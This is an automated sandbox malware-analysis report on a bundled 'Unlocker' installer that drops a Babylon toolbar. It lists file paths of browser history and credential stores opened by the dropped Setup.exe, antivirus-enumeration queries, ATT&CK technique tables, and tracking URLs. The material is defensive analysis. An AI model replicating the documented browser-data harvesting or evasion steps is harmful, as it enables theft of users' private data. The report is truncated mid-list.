%s%dBCL::GPD%dBCL::GPPV%dBCL::GPUV%d%dBCL::GPFV%dBCL::GFP%d%dBCL::GNP%dBL_GFTHBCL_GFLDBCL_GFMDBCL::GFD%dBCL_GCI2BCL_GCIBCL_GCFIBCL_GCFI1BCL_GFTT %s (%d)BCL_GFITBCL_GCINBCL_GINBCL_GFINBCL::GLT%dBCL::IC%dBCL_GSTSBCL_APBCL_FUSBL_ILEX 0x%pBCL_ILEBCL_IEBCL_GP %dBCL::MUU%dBCL_IBUP::ILPOK%dP::IMPOK%dP::IVOK%dP::IPE%dP::RID%dP::WID%dP_WIDP::WS%dP_SSDP_STCDP_MMSP::HAS%dP::MVS%dP_MS1P::IB%dP_APP_CTLP_MSP_CLPP_CMPP_CLPP_OP%0d%0a%%%02xUnEscURL url=%hs&lt;&gt;&amp;&quot;&apos;XML_EscA()&lt;&gt;&amp;&quot;&apos;XML_EscW()&lt;&gt;&amp;&quot;&apos;XML_EscA()&lt;&gt;&amp;&quot;&apos;XML_EscW()&lt;&gt;&amp;&quot;&apos;&lt;&gt;&amp;&quot;&apos;&; &amp;&; &amp;rBTM_gftCPRWL::Dest()CPRWL::Enter cat=%dCPRWL::Leave()PTSM::PTSM n_states=%dPTSM::~PTSM()PTSM::Wait st=%dPTSM::Set st=%d\VarFileInfo\Translation\StringFileInfo\%04x%04x\%sProgmanAdvApi32CreateProcessWithTokenWDllGetVersionComctl32.dllShell32.dllwut_enWinFG()wut_FFGWN/Awut_guliUser32.dllChangeWindowMessageFilterProgmanAdvApi32CreateProcessAsUserWopenECWP()User32.dllIsProcessDPIAwareroot\SecurityCenter2root\SecurityCenterSELECT * FROM AntivirusProductWQLdisplayName;Software\Microsoft\Windows\CurrentVersion\App Paths\PathIsWow64Processkernel32Software\Microsoft\Windows\CurrentVersion\Policies\SystemEnableLUArundll32.exeschtasks.exeGetProductInfokernel32.dllwut_sa2bwut_GWPBR(%d, %d)]:[_&?/%#+-%%%02X&?/%#+-%??%!Bad_URI!!!!!!Bad_URI!!Bad_URI!!Bad_URI!!!!!!!!!BABAuto%s%s%d%s%dBABCrossBABCrossBABCrossBABCrossBAB!Corrections!BAB!Convert!BAB!Messages!BAB!Analytics!,ERROR (%d)ERROR (%d)ERRORCPML::Dtor()CPML::Enter()CPML::Leave()EnglishArabicChinese(S)Chinese(T)DutchFinnishFrenchGermanGreekHebrewHungarianItalianJapaneseKoreanNorwegianPolishPortugueseRussianSpanishSwedishTurkishRomanianDanishHindiCzechIndonesianThaienEnglishengfrFrenchfraitItalianitaesSpanishspanlDutchdutptPortuguesepordeGermangerruRussianrusjaJapanesejpnzhtChinese (T)chtzhsChinese (S)chielGre
Source: C:\Users\user\Desktop\Unlocker1.9.2.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Unlocker1.9.2.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Unlocker1.9.2.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Setup.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Setup.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Setup.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Setup.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Setup.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Setup.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Setup.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Setup.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Setup.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Setup.exeCode function: GetLocaleInfoW,2_2_00502490
Source: C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Setup.exeCode function: 2_2_00452455 GetSystemTimeAsFileTime,__aulldiv,2_2_00452455
Source: C:\Users\user\Desktop\Unlocker1.9.2.exeCode function: 0_2_004059FF GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,0_2_004059FF
Source: C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Setup.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Setup.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Setup.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: Unlocker1.9.2.exe, 00000000.00000003.373205075.0000000000732000.00000004.00000020.00020000.00000000.sdmp, Unlocker1.9.2.exe, 00000000.00000003.297608040.000000000280E000.00000004.00000020.00020000.00000000.sdmp, Unlocker1.9.2.exe, 00000000.00000003.373387708.0000000000735000.00000004.00000020.00020000.00000000.sdmp, Unlocker1.9.2.exe, 00000000.00000002.373842768.0000000000736000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: UnlockerAssistant.exe
Source: Unlocker1.9.2.exe, 00000000.00000003.373205075.0000000000732000.00000004.00000020.00020000.00000000.sdmp, Unlocker1.9.2.exe, 00000000.00000003.297608040.000000000280E000.00000004.00000020.00020000.00000000.sdmp, Unlocker1.9.2.exe, 00000000.00000003.373387708.0000000000735000.00000004.00000020.00020000.00000000.sdmp, Unlocker1.9.2.exe, 00000000.00000002.373842768.0000000000736000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Software\Microsoft\Windows\CurrentVersion\App Paths\Unlocker.exe
Source: Unlocker1.9.2.exe, 00000000.00000003.352167331.0000000000780000.00000004.00000020.00020000.00000000.sdmp, Unlocker1.9.2.exe, 00000000.00000003.354488333.0000000000780000.00000004.00000020.00020000.00000000.sdmp, Start Unlocker.lnk.0.drBinary or memory string: C:\Program Files\Unlocker\Unlocker.exe
Source: Unlocker1.9.2.exe, 00000000.00000003.351057801.0000000000796000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\C:\Program Files\Unlocker\Unlocker.exe
Source: Unlocker1.9.2.exe, 00000000.00000003.373205075.0000000000732000.00000004.00000020.00020000.00000000.sdmp, Unlocker1.9.2.exe, 00000000.00000003.297608040.000000000280E000.00000004.00000020.00020000.00000000.sdmp, Unlocker1.9.2.exe, 00000000.00000003.373387708.0000000000735000.00000004.00000020.00020000.00000000.sdmp, Unlocker1.9.2.exe, 00000000.00000002.373842768.0000000000736000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \Unlocker.exe
Source: Unlocker1.9.2.exe, 00000000.00000003.373205075.0000000000732000.00000004.00000020.00020000.00000000.sdmp, Unlocker1.9.2.exe, 00000000.00000003.297608040.000000000280E000.00000004.00000020.00020000.00000000.sdmp, Unlocker1.9.2.exe, 00000000.00000003.373387708.0000000000735000.00000004.00000020.00020000.00000000.sdmp, Unlocker1.9.2.exe, 00000000.00000002.373842768.0000000000736000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \UnlockerAssistant.exe
Source: Setup.exe, 00000002.00000002.359689566.0000000000838000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000002.359689566.0000000000835000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: Start Unlocker.lnk.0.drBinary or memory string: C:\Program Files\Unlocker\Unlocker.exe>..\..\..\..\..\..\..\..\..\Program Files\Unlocker\Unlocker.exe
Source: Unlocker1.9.2.exe, 00000000.00000003.352167331.0000000000780000.00000004.00000020.00020000.00000000.sdmp, Unlocker1.9.2.exe, 00000000.00000003.354488333.0000000000796000.00000004.00000020.00020000.00000000.sdmp, Unlocker1.9.2.exe, 00000000.00000003.373205075.0000000000796000.00000004.00000020.00020000.00000000.sdmp, Unlocker1.9.2.exe, 00000000.00000003.354488333.0000000000780000.00000004.00000020.00020000.00000000.sdmp, Unlocker1.9.2.exe, 00000000.00000003.352167331.0000000000796000.00000004.00000020.00020000.00000000.sdmp, Unlocker1.9.2.exe, 00000000.00000003.373341873.0000000000796000.00000004.00000020.00020000.00000000.sdmp, Unlocker1.9.2.exe, 00000000.00000002.373897948.0000000000796000.00000004.00000020.00020000.00000000.sdmp, Start Unlocker.lnk.0.drBinary or memory string: Unlocker.exe

Stealing of Sensitive Information

barindex
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
Source: C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PreferencesJump to behavior
Source: C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Setup.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
Source: C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data-journalJump to behavior
Source: C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History-journalJump to behavior
Source: C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid Accounts1
Windows Management Instrumentation		1
DLL Side-Loading		1
DLL Side-Loading		1
Deobfuscate/Decode Files or Information		1
OS Credential Dumping		1
System Time Discovery		Remote Services1
Archive Collected Data		Exfiltration Over Other Network Medium1
Ingress Tool Transfer		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
System Shutdown/Reboot
Default Accounts2
Native API		21
Windows Service		21
Windows Service		2
Obfuscated Files or Information		111
Input Capture		3
File and Directory Discovery		Remote Desktop Protocol1
Data from Local System		Exfiltration Over Bluetooth1
Encrypted Channel		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)11
Registry Run Keys / Startup Folder		2
Process Injection		1
Software Packing		Security Account Manager25
System Information Discovery		SMB/Windows Admin Shares111
Input Capture		Automated Exfiltration2
Non-Application Layer Protocol		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)11
Registry Run Keys / Startup Folder		1
DLL Side-Loading		NTDS251
Security Software Discovery		Distributed Component Object Model1
Clipboard Data		Scheduled Transfer2
Application Layer Protocol		SIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script3
Masquerading		LSA Secrets3
Process Discovery		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.commonRc.common2
Process Injection		Cached Domain Credentials1
Remote System Discovery		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
External Remote ServicesScheduled TaskStartup ItemsStartup Items1
Regsvr32		DCSync1
System Network Configuration Discovery		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
Rundll32		Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 810721 Sample: Unlocker1.9.2.exe Startdate: 17/02/2023 Architecture: WINDOWS Score: 48 64 Antivirus / Scanner detection for submitted sample 2->64 66 Multi AV Scanner detection for submitted file 2->66 68 Sigma detected: rundll32 run dll from internet 2->68 70 Machine Learning detection for dropped file 2->70 9 Unlocker1.9.2.exe 11 49 2->9         started        process3 file4 42 C:\Users\user\AppData\Local\...\DeltaTB.exe, PE32 9->42 dropped 44 C:\Program Files\Unlocker\uninst.exe, PE32 9->44 dropped 46 C:\Program Files\...\UnlockerInject32.exe, PE32 9->46 dropped 48 6 other files (3 malicious) 9->48 dropped 82 Sample is not signed and drops a device driver 9->82 13 DeltaTB.exe 17 9->13         started        17 regsvr32.exe 9->17         started        signatures5 process6 file7 50 C:\Users\user\AppData\Local\...\Setup.exe, PE32 13->50 dropped 52 C:\Users\user\AppData\Local\...\IEHelper.dll, PE32 13->52 dropped 54 C:\Users\user\AppData\Local\...\BExternal.dll, PE32 13->54 dropped 56 C:\Users\user\AppData\Local\...\sqlite3.dll, PE32 13->56 dropped 84 Multi AV Scanner detection for dropped file 13->84 86 Machine Learning detection for dropped file 13->86 19 Setup.exe 1 90 13->19         started        24 regsvr32.exe 7 17->24         started        signatures8 process9 dnsIp10 58 stat.babylon-services.com 184.154.27.232, 49695, 49696, 49698 SINGLEHOP-LLCUS United States 19->58 60 dl.babylon-services.com 198.143.175.67, 49697, 80 SINGLEHOP-LLCUS United States 19->60 62 4 other IPs or domains 19->62 34 C:\Users\user\AppData\Local\...\setup.exe, PE32 19->34 dropped 36 C:\Users\user\AppData\Local\...\IEHelper.dll, PE32 19->36 dropped 38 C:\Users\user\AppData\Local\...\BExternal.dll, PE32 19->38 dropped 40 C:\Users\user\AppData\Local\...\sqlite3.dll, PE32 19->40 dropped 72 Multi AV Scanner detection for dropped file 19->72 74 Contains functionality to register a low level keyboard hook 19->74 76 Tries to harvest and steal browser information (history, passwords, etc) 19->76 78 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 19->78 26 rundll32.exe 1 19->26         started        28 rundll32.exe 19->28         started        30 setup.exe 19->30         started        80 Creates an undocumented autostart registry key 24->80 file11 signatures12 process13 process14 32 ielowutil.exe 6 26->32         started       

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
Unlocker1.9.2.exe55%ReversingLabs
Unlocker1.9.2.exe44%VirustotalBrowse
Unlocker1.9.2.exe100%AviraAPPL/Toolbar.Babylon.10785

Dropped Files

SourceDetectionScannerLabelLink
C:\Users\user\AppData\Local\Temp\DeltaTB.exe100%Joe Sandbox ML
C:\Program Files\Unlocker\UnlockerInject32.exe100%Joe Sandbox ML
C:\Program Files\Unlocker\Unlocker.exe2%ReversingLabs
C:\Program Files\Unlocker\UnlockerCOM.dll0%ReversingLabs
C:\Program Files\Unlocker\UnlockerDriver5.sys0%ReversingLabs
C:\Program Files\Unlocker\UnlockerInject32.exe0%ReversingLabs
C:\Program Files\Unlocker\uninst.exe2%ReversingLabs
C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\BExternal.dll5%ReversingLabs
C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\IEHelper.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Latest\BExternal.dll5%ReversingLabs
C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Latest\IEHelper.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Latest\setup.exe0%ReversingLabs
C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Latest\sqlite3.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Setup.exe23%ReversingLabsWin32.PUA.Presenoker
C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\sqlite3.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\DeltaTB.exe44%ReversingLabsWin32.PUA.Presenoker
C:\Users\user\AppData\Local\Temp\nsv5446.tmp\InstallOptions.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\nsv5446.tmp\LangDLL.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\nsv5446.tmp\System.dll0%ReversingLabs

Unpacked PE Files

SourceDetectionScannerLabelLinkDownload
0.3.Unlocker1.9.2.exe.7c2a98.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
0.0.Unlocker1.9.2.exe.400000.0.unpack100%AviraHEUR/AGEN.1223487Download File
0.2.Unlocker1.9.2.exe.400000.0.unpack100%AviraHEUR/AGEN.1223487Download File

Domains

SourceDetectionScannerLabelLink
dl.babylon-services.com0%VirustotalBrowse
stp.babylon-services.com0%VirustotalBrowse
stat.babylon-services.com1%VirustotalBrowse
stat.info-stream.net3%VirustotalBrowse

URLs

SourceDetectionScannerLabelLink
http://ocsp.thawte.com00%URL Reputationsafe
http://stat.info-stream.net/report.php?no_policy=1&lang=0&sSW:0%Avira URL Cloudsafe
http://www.my-online-search.com/?babsrc=HP_ofln&mntrId=C839ECF4BBEA1588&dlb=0&affID=1224710%Avira URL Cloudsafe
http://www.my-online-search.com/?babsrc=HP_ofln&mntrId=C839ECF4BBEA1588&dlb=0&affID=122471dat0%Avira URL Cloudsafe
http://www.my-online-search.com/?babsrc=HP_ofln&mntrId=C839ECF4BBEA1588&dlb=0&affID=122471t0%Avira URL Cloudsafe
http://babylon.comz0%Avira URL Cloudsafe
http://stat.info-stream.net/report.php?no_policy=1&lang=0&s0%Avira URL Cloudsafe
http://www.my-online-search.com0%Avira URL Cloudsafe
http://stat.info-strea0%Avira URL Cloudsafe
http://Kernel32.dllSetDllDirectoryW0%Avira URL Cloudsafe
http://babylon.comGa0%Avira URL Cloudsafe
http://stat.info-strea/downloader.php?ver=9.1.1.10&affilID=122471&guid=0%Avira URL Cloudsafe
http://stat.info-stream.net/report.php?no_policy=1&lang=0&source=setup-start&stage=0&ver=9.1.1.10&affilID=122471&guid={AB9CC252-CABB-4562-BE9F-5C103C6D7C77}&mntrId=C839ECF4BBEA1588&moldid=c839d64e000000000000ecf4bbea1588&sufn=Unlocker1.9.2.exe&iev=11&ffv=0&crv=104&dwb=cr&dlb=ie&wbr=1&ibprs=NA&ibprv=0&sutp=50&sufl=66&tbp=0&prver=0&minreq=0&dtct=-10000000&wvr=602&avr=V2luZG93cyBEZWZlbmRlcg==&tbtp=def&tbinst=1&w64=1&cntry=US&cat=delta&uac=1&osp=hp0:-1938492880;hp1:0;hp2:0;dsp0:-886302982;dsp1:0;dsp2:0;&dnt=2.0,3.0,3.5,4.00%Avira URL Cloudsafe
http://www.my-online-search.com&babsrc=SP_ofln&mntrId=&dlb=%d&babsrc=SP_def&NT_HP_TB_SP_My0%Avira URL Cloudsafe
http://stat.info-stream.net/report.php?no_policy=1&lang=0&source=setup-end&stage=91&ver=9.1.1.10&aff0%Avira URL Cloudsafe
http://babylon.com=0%Avira URL Cloudsafe
http://www.my-online-search.com/?babsrc=HP_ofln&mntrId=C839ECF4BBEA1588&dlb=0&affID=12247115880%Avira URL Cloudsafe
http://babylon.comC0%Avira URL Cloudsafe
http://www.my-online-search.com/9.2.exerefox0%Avira URL Cloudsafe
http://www.my-online-search.com/?q=0%Avira URL Cloudsafe
http://stat.info-stream.net/report.php?no_policy=1&lang=0&source=setup-end&stage=111&ver=9.1.1.10&af0%Avira URL Cloudsafe
http://stat.info-stream.net/report.php?no_policy=1&lang=0&source=setup-end&stage=91&ver=9.1.1.10&affilID=122471&guid={AB9CC252-CABB-4562-BE9F-5C103C6D7C77}&mntrId=C839ECF4BBEA1588&moldid=c839d64e000000000000ecf4bbea1588&sufn=Unlocker1.9.2.exe&iev=11&ffv=0&crv=104&dwb=cr&dlb=ie&wbr=1&ibprs=NA&ibprv=0&sutp=50&sufl=66&tbp=0&prver=0&minreq=0&dtct=-10000000&wvr=602&avr=V2luZG93cyBEZWZlbmRlcg==&tbtp=def&tbinst=1&w64=1&cntry=US&cat=delta&uac=1&osp=hp0:-1938492880;hp1:0;hp2:0;dsp0:-886302982;dsp1:0;dsp2:0;&dnt=2.0,3.0,3.5,4.0&hp=1&dsp=1&tb=1&hpx=0&dspx=0&rvrt=0&excd=0&stm=2&nvs=0&dnld=100&dcnt=1&dtot=1&dlerr=200&dltm=0&dlsz=3844&dsflr=0&errurl=Setup2.zpb&hpc=1998245871&spc=1998245871&tbx=00%Avira URL Cloudsafe
http://www.my-online-search.com/?babsrc=HP_ofln&mntrId=C839ECF4BBEA1588&dlb=0&affID=122471tml0%Avira URL Cloudsafe
http://www.my-online-search.comhttp://www.my-online-search.com/?babsrc=HP_ofln&mntrId=&dlb=%dhome&?/0%Avira URL Cloudsafe
http://stat.info-stream.net/report.php?no_policy=1&lang=0&source=setup-start&stage=0&ver=9.1.1.10&af0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
dl.babylon-services.com
198.143.175.67
truefalseunknown
stp.babylon-services.com
184.154.27.232
truefalseunknown
stat.babylon-services.com
184.154.27.232
truefalseunknown
stp.babylon.com
unknown
unknownfalse
    		high
    dl.babylon.com
    		unknown
    		unknownfalse
      		high
      stat.info-stream.net
      		unknown
      		unknownfalseunknown

      Contacted URLs

      NameMaliciousAntivirus DetectionReputation
      http://stat.info-stream.net/report.php?no_policy=1&lang=0&source=setup-start&stage=0&ver=9.1.1.10&affilID=122471&guid={AB9CC252-CABB-4562-BE9F-5C103C6D7C77}&mntrId=C839ECF4BBEA1588&moldid=c839d64e000000000000ecf4bbea1588&sufn=Unlocker1.9.2.exe&iev=11&ffv=0&crv=104&dwb=cr&dlb=ie&wbr=1&ibprs=NA&ibprv=0&sutp=50&sufl=66&tbp=0&prver=0&minreq=0&dtct=-10000000&wvr=602&avr=V2luZG93cyBEZWZlbmRlcg==&tbtp=def&tbinst=1&w64=1&cntry=US&cat=delta&uac=1&osp=hp0:-1938492880;hp1:0;hp2:0;dsp0:-886302982;dsp1:0;dsp2:0;&dnt=2.0,3.0,3.5,4.0true
      • Avira URL Cloud: safe
      		unknown
      http://stat.info-stream.net/report.php?no_policy=1&lang=0&source=setup-end&stage=91&ver=9.1.1.10&affilID=122471&guid={AB9CC252-CABB-4562-BE9F-5C103C6D7C77}&mntrId=C839ECF4BBEA1588&moldid=c839d64e000000000000ecf4bbea1588&sufn=Unlocker1.9.2.exe&iev=11&ffv=0&crv=104&dwb=cr&dlb=ie&wbr=1&ibprs=NA&ibprv=0&sutp=50&sufl=66&tbp=0&prver=0&minreq=0&dtct=-10000000&wvr=602&avr=V2luZG93cyBEZWZlbmRlcg==&tbtp=def&tbinst=1&w64=1&cntry=US&cat=delta&uac=1&osp=hp0:-1938492880;hp1:0;hp2:0;dsp0:-886302982;dsp1:0;dsp2:0;&dnt=2.0,3.0,3.5,4.0&hp=1&dsp=1&tb=1&hpx=0&dspx=0&rvrt=0&excd=0&stm=2&nvs=0&dnld=100&dcnt=1&dtot=1&dlerr=200&dltm=0&dlsz=3844&dsflr=0&errurl=Setup2.zpb&hpc=1998245871&spc=1998245871&tbx=0true
      • Avira URL Cloud: safe
      		unknown

      URLs from Memory and Binaries

      NameSourceMaliciousAntivirus DetectionReputation
      http://info.babylon.com/setup/downloader.phpSetup.exe, 00000002.00000003.342962556.00000000022BD000.00000004.00000020.00020000.00000000.sdmp, Babylon.dat.2.dr, Babylon.dat.1.drfalse
        		high
        http://www.babylon.com/redirects/redir.cgi?bSetup.exe, 00000002.00000002.360465899.00000000022BD000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.345275350.00000000022BD000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.354723745.00000000022BB000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.344418944.00000000022BD000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.342497747.00000000022BA000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.343684462.00000000022BD000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.344879058.00000000022BD000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.342962556.00000000022BD000.00000004.00000020.00020000.00000000.sdmpfalse
          		high
          http://dl.babylon.com/site/files/Setup9/dwr/latest/latest_bl/Setup2.zpbvSetup.exe, 00000002.00000002.359689566.0000000000867000.00000004.00000020.00020000.00000000.sdmpfalse
            		high
            http://stat.info-streaSetup.exe, 00000002.00000002.358963994.000000000017D000.00000004.00000010.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            http://www.babylon.com/redirects/redir.cgi?type=babylon6_full_texthySetup.exe, 00000002.00000002.360676354.0000000002393000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.355893826.000000000231A000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.343726697.0000000002317000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.344438579.0000000002317000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.358228779.0000000002393000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.357162551.0000000002345000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.343213411.0000000002317000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.342989828.0000000002317000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.356035345.0000000002322000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.356796571.0000000002331000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.342313026.0000000002317000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.344897131.0000000002317000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.342737496.0000000002317000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.354921205.0000000002317000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.345307808.0000000002317000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.358133429.000000000238C000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.344737594.0000000002317000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.345130958.0000000002317000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.354747612.0000000002317000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.354625909.0000000002317000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.355334279.0000000002317000.00000004.00000020.00020000.00000000.sdmpfalse
              		high
              http://search.babylon.comDeltaTB.exe, 00000001.00000003.361456680.0000000002310000.00000004.00001000.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.355252592.00000000022AA000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000002.360465899.00000000022BD000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.345275350.00000000022BD000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.354723745.00000000022BB000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.356198792.00000000022B4000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000002.360465899.00000000022B6000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.342266400.00000000022B7000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.344418944.00000000022BD000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.342497747.00000000022BA000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.355592760.00000000022B0000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 